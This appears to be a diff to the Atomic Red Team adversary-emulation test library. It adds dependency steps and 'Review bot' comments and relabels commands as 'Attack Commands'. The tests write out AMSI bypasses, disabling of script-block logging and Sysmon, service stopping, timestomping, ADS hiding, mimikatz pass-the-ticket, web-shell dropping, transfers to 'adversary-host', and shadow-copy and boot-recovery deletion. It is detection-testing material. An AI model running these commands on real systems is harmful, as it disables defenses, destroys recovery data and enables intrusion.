@@ -239,21 +278,50 @@ Uninstall Sysinternals Sysmon for Defense Evasion
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | Path | PathToAtomicsFolder\T1089\bin\sysmon.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
sysmon -u
```
#### Commands to Check Prerequisites:
```
sc query sysmon > nul
```
#### Cleanup Commands:
```
sysmon -i -accepteula
```
#### Dependencies: Run with `powershell`!
##### Description: Sysmon executable must be available
##### Check Prereq Commands:
```
if(cmd /c where sysmon) {0} else {1}
```
##### Get Prereq Commands:
```
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
```
##### Description: Sysmon must be installed
##### Check Prereq Commands:
```
if(cmd /c sc query sysmon) {0} else {1}
```
##### Get Prereq Commands:
```
cmd /c sysmon -i -accepteula
```
<br/>
<br/>
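Review bot: the Get Prereq Commands for "Sysmon executable must be available" download and unpack Sysmon.zip and then run the result elevated with no check on what was fetched; verify the binary before use, for example `if((Get-AuthenticodeSignature "$parentpath\Sysmon.exe").Status -ne 'Valid') { throw 'unexpected signature' }` after `Expand-Archive` (Sysinternals tools are Authenticode-signed, so a valid status is the expected outcome). Separately, `$Env:Path += ";$parentpath"` only alters the environment of the PowerShell process running the dependency, while the attack command `sysmon -u` and the cleanup run through the `command_prompt` executor; unless that cmd.exe is spawned from the same process, it will not see the new PATH entry and `sysmon` will not resolve. Using the full `#{sysmon_exe}` path in `command` and `cleanup_command` removes the dependence on PATH altogether.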
@@ -264,17 +332,21 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```
#### Cleanup Commands:
```
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
```
<br/>
<br/>
@@ -285,17 +357,21 @@ This test removes the Windows Defender provider registry key.
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
```
#### Cleanup Commands:
```
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
```
<br/>
<br/>
@@ -305,24 +381,28 @@ With administrative rights, an adversary can disable Windows Services related to
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| service_name | The name of the service to stop | String | McAfeeDLPAgentService|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
net.exe stop #{service_name}
sc.exe config #{service_name} start= disabled
```
#### Cleanup Commands:
```
sc.exe config #{service_name} start= auto
net.exe start #{service_name}
```
<br/>
<br/>
@@ -334,7 +414,8 @@ Credit to Matt Graeber (@mattifestation) for the research.
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
@@ -342,7 +423,6 @@ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
```
#### Cleanup Commands:
```
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
@@ -351,6 +431,10 @@ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
```
<br/>
<br/>
@@ -362,11 +446,15 @@ Credit to Matt Graeber (@mattifestation) for the research.
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```
<br/>
+37 -2
@@ -106,6 +106,15 @@ atomic_tests:
description: The name of the Sysmon filter driver (this can change from the default)
type: string
default: SysmonDrv
dependencies:
- description: |
Sysmon filter must be loaded
prereq_command: |
fltmc.exe filters | findstr #{sysmon_driver}
get_prereq_command: |
echo Automated installer not implemented yet, please install Sysmon manually
executor:
name: command_prompt
elevation_required: true
@@ -124,11 +133,13 @@ atomic_tests:
This action requires HTTP logging configurations in IIS to be unlocked.
supported_platforms:
- windows
input_arguments:
website_name:
description: The name of the website on a server
type: string
default: Default Web Site
executor:
name: powershell
prereq_command: |
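Review bot: this test keeps its prerequisite under `executor.prereq_command` while the neighbouring T1089 tests in this PR move theirs into the new `dependencies` list, so both mechanisms now coexist in one file; either convert this one too (description "appcmd.exe must be present", `prereq_command: if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {0} else {1}`, and a `get_prereq_command` that states IIS must be installed manually) or document in the test spec that `prereq_command` on the executor remains supported for tests without an automated fetch step.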
@@ -143,11 +154,35 @@ atomic_tests:
Uninstall Sysinternals Sysmon for Defense Evasion
supported_platforms:
- windows
input_arguments:
sysmon_exe:
description: The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH)
type: Path
default: PathToAtomicsFolder\T1089\bin\sysmon.exe
dependency_executor_name: powershell
dependencies:
- description: |
Sysmon executable must be available
prereq_command: |
if(cmd /c where sysmon) {0} else {1}
get_prereq_command: |
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
- description: |
Sysmon must be installed
prereq_command: |
if(cmd /c sc query sysmon) {0} else {1}
get_prereq_command: |
cmd /c sysmon -i -accepteula
executor:
name: command_prompt
elevation_required: true
prereq_command: |
sc query sysmon > nul
command: |
sysmon -u
cleanup_command: |
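Review bot: the second dependency's check `if(cmd /c sc query sysmon) {0} else {1}` returns 0 whether or not the service exists, because sc.exe prints its `OpenService FAILED 1060` error to standard output and any non-empty output is truthy in PowerShell, so "Sysmon must be installed" is always reported as satisfied; test the service object or the exit code instead, e.g. `if(Get-Service sysmon -ErrorAction SilentlyContinue) {0} else {1}`. Also, `dependency_executor_name: powershell` is a new top-level key introduced in this hunk so that dependencies can run in PowerShell while the executor is command_prompt; it needs an entry in the atomic test spec/schema, including a note that it defaults to the executor's name when absent, which the T1086 and Sysmon-driver tests rely on.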
+14 -6
@@ -23,24 +23,28 @@ Note that this test may conflict with pre-existing system configuration.
**Supported Platforms:** macOS, Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| proxy_server | Proxy server URL (host:port) | url | 127.0.0.1:8080|
| proxy_scheme | Protocol to proxy (http or https) | string | http|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
export #{proxy_scheme}_proxy=#{proxy_server}
```
#### Cleanup Commands:
```
unset http_proxy
unset https_proxy
```
<br/>
<br/>
@@ -51,22 +55,26 @@ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| listenport | Specifies the IPv4 port, by port number or service name, on which to listen. | string | 1337|
| connectport | Specifies the IPv4 port, by port number or service name, to which to connect. If connectport is not specified, the default is the value of listenport on the local computer. | string | 1337|
| connectaddress | Specifies the IPv4 address to which to connect. Acceptable values are IP address, computer NetBIOS name, or computer DNS name. If an address is not specified, the default is the local computer. | string | 127.0.0.1|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=#{connectaddress}
```
#### Cleanup Commands:
```
netsh interface portproxy delete v4tov4 listenport=#{listenport}
```
<br/>
+7 -3
@@ -16,7 +16,7 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| parent_process_name | Name of the parent process | string | explorer|
@@ -24,17 +24,21 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/
| hollow_binary_path | Path of the binary to hollow (executable that will run inside the sponsor) | string | C:\Windows\System32\cmd.exe|
| spawnto_process_name | Name of the process to spawn | string | calc|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
. $PathToAtomicsFolder\T1093\src\Start-Hollow.ps1
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
```
#### Cleanup Commands:
```
Stop-Process -Name "#{spawnto_process_name}"
```
<br/>
+6 -2
@@ -21,12 +21,13 @@ Execute from Alternate Streams
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path | Path of ADS file | path | c:\ADS\|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe
@@ -42,4 +43,7 @@ esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
<br/>
+6 -2
@@ -21,17 +21,21 @@ Similar to PTH, but attacking Kerberos
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username | string | Administrator|
| domain | domain | string | atomic.local|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
mimikatz # kerberos::ptt #{user_name}@#{domain}
```
<br/>
+5 -1
@@ -27,7 +27,8 @@ Manipulate Admin Account Name
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
$x = Get-Random -Minimum 2 -Maximum 9999
$y = Get-Random -Minimum 2 -Maximum 9999
@@ -49,4 +50,7 @@ foreach($member in $fmm) {
<br/>
+42 -14
@@ -27,18 +27,22 @@ Stomps on the access timestamp of a file
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
touch -a -t 197001010000.00 #{target_filename}
```
<br/>
<br/>
@@ -48,18 +52,22 @@ Stomps on the modification timestamp of a file
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
touch -m -t 197001010000.00 #{target_filename}
```
<br/>
<br/>
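Review bot: the input description in this hunk reads `Path of file that we are going to stomp on last access time`, but this test changes the modification timestamp (`touch -m`); the text looks copied from the access-time test above, and the same wording recurs under the system-date test that follows. Each description should name the timestamp that test actually stomps.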
@@ -72,12 +80,13 @@ Sudo or root privileges are required to change date. Use with caution.
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
NOW=$(date)
date -s "1970-01-01 00:00:00"
@@ -88,6 +97,9 @@ stat #{target_filename}
<br/>
<br/>
@@ -99,19 +111,23 @@ This technique was used by the threat actor Rocke during the compromise of Linux
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| reference_file_path | Path of reference file to read timestamps from | Path | /bin/sh|
| target_file_path | Path of file to modify timestamps of | Path | /opt/filename|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
touch -acmr #{reference_file_path} {target_file_path}
```
<br/>
<br/>
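Review bot: the attack command `touch -acmr #{reference_file_path} {target_file_path}` is missing the `#` on the second placeholder, so the executor will not substitute it and touch creates a literal file named `{target_file_path}` in the working directory instead of modifying the intended file; it should read `#{target_file_path}`, and the fix belongs in the T1099 yaml.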
@@ -123,19 +139,23 @@ This technique was seen in use by the Stitch RAT.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path of file to change creation timestamp | Path | C:\Some\file.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
powershell.exe Get-ChildItem #{file_path} | % { $_.CreationTime = #{target_date_time} }
```
<br/>
<br/>
@@ -147,19 +167,23 @@ This technique was seen in use by the Stitch RAT.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path of file to change last modified timestamp | Path | C:\Some\file.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
powershell.exe Get-ChildItem #{file_path} | % { $_.LastWriteTime = #{target_date_time} }
```
<br/>
<br/>
@@ -171,17 +195,21 @@ This technique was seen in use by the Stitch RAT.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path of file to change last access timestamp | Path | C:\Some\file.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
powershell.exe Get-ChildItem #{file_path} | % { $_.LastAccessTime = #{target_date_time} }
```
<br/>
+7 -3
@@ -19,21 +19,25 @@ cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| web_shell_path | The path to drop the web shell | string | C:\inetpub\wwwroot|
| web_shells | Path of Web Shell | path | PathToAtomicsFolder\T1100\shells\|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
xcopy #{web_shells} #{web_shell_path}
```
#### Cleanup Commands:
```
del #{web_shell_path}
```
<br/>
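Review bot: the cleanup command `del #{web_shell_path}` targets the directory given by web_shell_path (default `C:\inetpub\wwwroot`), so it removes every file in the web root rather than only the shells that `xcopy` copied in; delete the copied files by name instead (the hunk header mentions `cmd.aspx`, so e.g. `del "#{web_shell_path}\cmd.aspx"` for each file shipped in `#{web_shells}`).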
+6 -2
@@ -15,12 +15,13 @@ Add a value to a Windows registry SSP key, simulating an adversarial modificatio
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| fake_ssp_dll | Value added to registry key. Normally refers to a DLL name in C:\Windows\System32. | String | not-a-ssp|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
# run these in sequence
$SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
@@ -34,4 +35,7 @@ Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Pack
<br/>
+12 -4
@@ -23,17 +23,21 @@ Download data from a public website using command line
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/ %TEMP%\bitsadmindownload.html
```
#### Cleanup Commands:
```
del %TEMP%\bitsadmindownload.html
```
<br/>
<br/>
@@ -43,7 +47,8 @@ Multiple download methods for files using powershell
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Invoke-WebRequest -Uri www.twitter.com
$T1102 = (New-Object System.Net.WebClient).DownloadData("https://www.reddit.com/")
@@ -51,10 +56,13 @@ $wc = New-Object System.Net.WebClient
$T1102 = $wc.DownloadString("https://www.aol.com/")
```
#### Cleanup Commands:
```
Clear-Variable T1102
```
<br/>
+6 -2
@@ -17,16 +17,20 @@ AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded i
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| registry_file | Windows Registry File | Path | T1103.reg|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
reg.exe import #{registry_file}
```
<br/>
+60 -20
@@ -35,7 +35,7 @@ Utilize rsync to perform a remote file copy (push)
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| local_path | Path of folder to copy | Path | /tmp/adversary-rsync/|
@@ -43,13 +43,17 @@ Utilize rsync to perform a remote file copy (push)
| remote_host | Remote host to copy toward | String | victim-host|
| remote_path | Remote path to receive rsync | Path | /tmp/victim-files|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
```
<br/>
<br/>
@@ -59,7 +63,7 @@ Utilize rsync to perform a remote file copy (pull)
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Path of folder to copy | Path | /tmp/adversary-rsync/|
@@ -67,13 +71,17 @@ Utilize rsync to perform a remote file copy (pull)
| remote_host | Remote host to copy from | String | adversary-host|
| local_path | Local path to receive rsync | Path | /tmp/victim-files|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
```
<br/>
<br/>
@@ -83,7 +91,7 @@ Utilize scp to perform a remote file copy (push)
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| local_file | Path of file to copy | Path | /tmp/adversary-scp|
@@ -91,13 +99,17 @@ Utilize scp to perform a remote file copy (push)
| remote_host | Remote host to copy toward | String | victim-host|
| remote_path | Remote path to receive scp | Path | /tmp/victim-files/|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
scp #{local_file} #{username}@#{remote_host}:#{remote_path}
```
<br/>
<br/>
@@ -107,7 +119,7 @@ Utilize scp to perform a remote file copy (pull)
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | Path of file to copy | Path | /tmp/adversary-scp|
@@ -115,13 +127,17 @@ Utilize scp to perform a remote file copy (pull)
| remote_host | Remote host to copy from | String | adversary-host|
| local_path | Local path to receive scp | Path | /tmp/victim-files/|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
scp #{username}@#{remote_host}:#{remote_file} #{local_path}
```
<br/>
<br/>
@@ -131,7 +147,7 @@ Utilize sftp to perform a remote file copy (push)
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| local_file | Path of file to copy | Path | /tmp/adversary-sftp|
@@ -139,13 +155,17 @@ Utilize sftp to perform a remote file copy (push)
| remote_host | Remote host to copy toward | String | victim-host|
| remote_path | Remote path to receive sftp | Path | /tmp/victim-files/|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
```
<br/>
<br/>
@@ -155,7 +175,7 @@ Utilize sftp to perform a remote file copy (pull)
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | Path of file to copy | Path | /tmp/adversary-sftp|
@@ -163,13 +183,17 @@ Utilize sftp to perform a remote file copy (pull)
| remote_host | Remote host to copy from | String | adversary-host|
| local_path | Local path to receive sftp | Path | /tmp/victim-files/|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
```
<br/>
<br/>
@@ -179,19 +203,23 @@ Use certutil -urlcache argument to download a file from the web. Note - /urlcach
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
```
<br/>
<br/>
@@ -201,13 +229,14 @@ Use certutil -verifyctl argument to download a file from the web. Note - /verify
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
@@ -218,6 +247,9 @@ Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-
<br/>
<br/>
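Review bot: both `New-Item -Path $datePath -ItemType Directory` and the `Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-...` pipeline in this hunk's context line work on whatever the current working directory happens to be, so running the test from an unexpected location creates the certutil-* folder there and moves every non-.txt entry in that directory. Pin both to an explicit location, e.g. `$datePath = Join-Path $env:TEMP "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"` and `Get-ChildItem -Path $env:TEMP ...`, so the test is reproducible and cannot touch unrelated files.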
@@ -228,20 +260,24 @@ This technique is used by Qbot malware to download payloads.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bits_job_name | Name of the created BITS job | String | qcxjb7|
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}
```
<br/>
<br/>
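Review bot: the `local_path` default `Atomic-license.txt` is a relative name, but `bitsadmin.exe /transfer` hands the local path to the BITS service, which requires a fully qualified path; with the default as written the transfer fails before anything is downloaded. Suggest defaulting to `%TEMP%\Atomic-license.txt` (and the same change for the other download tests that share this default).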
@@ -252,17 +288,21 @@ This technique is used by multiple adversaries and malware families.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{local_path}")
```
<br/>
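Review bot: executor and command do not match: the heading says `Run with command_prompt`, but `(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{local_path}")` is PowerShell and will not parse in cmd.exe. Either change the executor to `powershell` or wrap the line as `powershell -command "(New-Object System.Net.WebClient).DownloadFile(...)"`.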
+70 -18
@@ -41,18 +41,22 @@ Delete a single file from the temporary directory
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_delete | Path of file to delete | Path | /tmp/victim-files/a|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
rm -f #{file_to_delete}
```
<br/>
<br/>
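Review bot: nothing in this hunk creates `/tmp/victim-files/a` before `rm -f #{file_to_delete}` runs, and `-f` suppresses the missing-file error, so on a fresh host the test exits 0 without having deleted anything and any detection built on it never fires. Add a prerequisite step (`mkdir -p /tmp/victim-files && touch #{file_to_delete}`) so the deletion actually happens; the same applies to the folder and `shred` tests that follow.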
@@ -62,18 +66,22 @@ Recursively delete the temporary directory and all files contained within it
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| folder_to_delete | Path of folder to delete | Path | /tmp/victim-files|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
rm -rf #{folder_to_delete}
```
<br/>
<br/>
@@ -83,18 +91,22 @@ Use the `shred` command to overwrite the temporary file and then delete it
**Supported Platforms:** Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_shred | Path of file to shred | Path | /tmp/victim-shred.txt|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
shred -u #{file_to_shred}
```
<br/>
<br/>
@@ -104,7 +116,8 @@ Delete a single file from the temporary directory using cmd.exe
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
echo "T1107" > %temp%\T1107.txt
del /f %temp%\T1107.txt
@@ -112,6 +125,9 @@ del /f %temp%\T1107.txt
<br/>
<br/>
@@ -121,7 +137,8 @@ Recursively delete the temporary directory and all files contained within it usi
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
mkdir %temp%\T1107
rmdir /s /q %temp%\T1107
@@ -129,6 +146,9 @@ rmdir /s /q %temp%\T1107
<br/>
<br/>
@@ -138,7 +158,8 @@ Delete a single file from the temporary directory using Powershell
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
New-Item $env:TEMP\T1107.txt
Remove-Item -path $env:TEMP\T1107.txt
@@ -146,6 +167,9 @@ Remove-Item -path $env:TEMP\T1107.txt
<br/>
<br/>
@@ -155,12 +179,13 @@ Recursively delete the temporary directory and all files contained within it usi
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| folder_to_delete | Path of folder to delete | Path | C:\Windows\Temp\victim-files-ps|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
New-Item $env:TEMP\T1107 -ItemType Directory
Remove-Item -path $env:TEMP\T1107 -recurse
@@ -168,6 +193,9 @@ Remove-Item -path $env:TEMP\T1107 -recurse
<br/>
<br/>
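Review bot: the `folder_to_delete` input (default `C:\Windows\Temp\victim-files-ps`) is declared but never referenced: both `New-Item $env:TEMP\T1107 -ItemType Directory` and `Remove-Item -path $env:TEMP\T1107 -recurse` hard-code the path. Either use `#{folder_to_delete}` in both commands or drop the Inputs table so the documentation matches what runs.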
@@ -177,13 +205,17 @@ Delete all volume shadow copies with vssadmin.exe
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
vssadmin.exe Delete Shadows /All /Quiet
```
<br/>
<br/>
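Review bot: `vssadmin.exe Delete Shadows /All /Quiet` is irreversible (no cleanup step can recreate the deleted shadow copies), yet the test description carries no warning; it should state this as plainly as the Linux Delete Filesystem test below does ("dangerous and destructive, do NOT use on production equipment"). The same applies to the `wmic shadowcopy delete` test that follows.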
@@ -193,13 +225,17 @@ Delete all volume shadow copies with wmic
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
wmic shadowcopy delete
```
<br/>
<br/>
@@ -209,7 +245,8 @@ This test leverages `bcdedit` to remove boot-time recovery measures.
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
@@ -217,6 +254,9 @@ bcdedit /set {default} recoveryenabled no
<br/>
<br/>
